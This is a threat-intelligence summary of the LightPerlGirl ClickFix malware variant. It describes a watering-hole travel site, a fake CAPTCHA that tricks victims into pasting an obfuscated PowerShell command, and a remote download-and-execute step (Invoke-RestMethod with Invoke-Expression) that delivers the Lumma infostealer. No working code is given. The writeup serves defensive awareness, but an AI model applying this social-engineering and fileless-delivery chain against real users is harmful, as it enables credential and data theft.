LightPerlGirl is a newly discovered variant of the ClickFix malware family, identified in June 2025. This variant leverages advanced social engineering tactics and stealthy execution methods to infect users, primarily delivering the Lumma infostealer payload.
Attack Vector and Infection Method
• Waterholing Attack: The LightPerlGirl variant was found on a compromised WordPress travel site, used as a watering hole to lure victims searching for Galapagos vacations.
• Social Engineering: Victims are presented with a fake Cloudflare CAPTCHA pop-up, instructing them to press Windows + R, then CTRL + V, and click ‘OK’. By this point, the site has already loaded a malicious, obfuscated PowerShell command into the clipboard.
• Clipboard Hijacking: The user unknowingly pastes and executes the obfuscated PowerShell code, which is then interpreted by the system to fetch and execute additional malicious code from a remote command-and-control (C2) server.
Technical Details
• In-Memory Execution: The PowerShell command is executed directly in memory, making detection by traditional antivirus and endpoint security tools more difficult.
• Obfuscation: The initial command is heavily obfuscated to evade user suspicion and automated analysis.
• Payload Delivery: The PowerShell script uses Invoke-RestMethod to contact a C2 domain, downloads further code, and executes it using Invoke-Expression. The final payload is the Lumma infostealer, which is capable of stealing sensitive data from the infected system.
Stealth and Evasion
• LOLBINS Technique: ClickFix exploits legitimate Windows binaries (LOLBINS) like PowerShell to avoid detection and bypass security controls.
• Target Profile: The attack is not highly targeted, but the use of a travel site for expensive destinations may increase the likelihood of infecting well-off individuals or company executives, whose personal devices may lack enterprise-grade security.
Attribution and Ongoing Research
• Uncertain Origins: It is unclear whether the creators of Lumma infostealer are also behind LightPerlGirl, or if the malware is being distributed as part of an affiliate or malware-as-a-service operation.
• Naming: The name “LightPerlGirl” comes from a copyright notice found within the malware code.
Broader Context
• ClickFix Evolution: ClickFix has evolved from a Windows-only threat to targeting macOS, Android, and iOS, employing browser-based and drive-by techniques on those platforms.
• Adoption by Threat Actors: Both cybercriminal and state-sponsored groups, including Russia-linked APTs, have adopted ClickFix techniques for delivering various malware families.
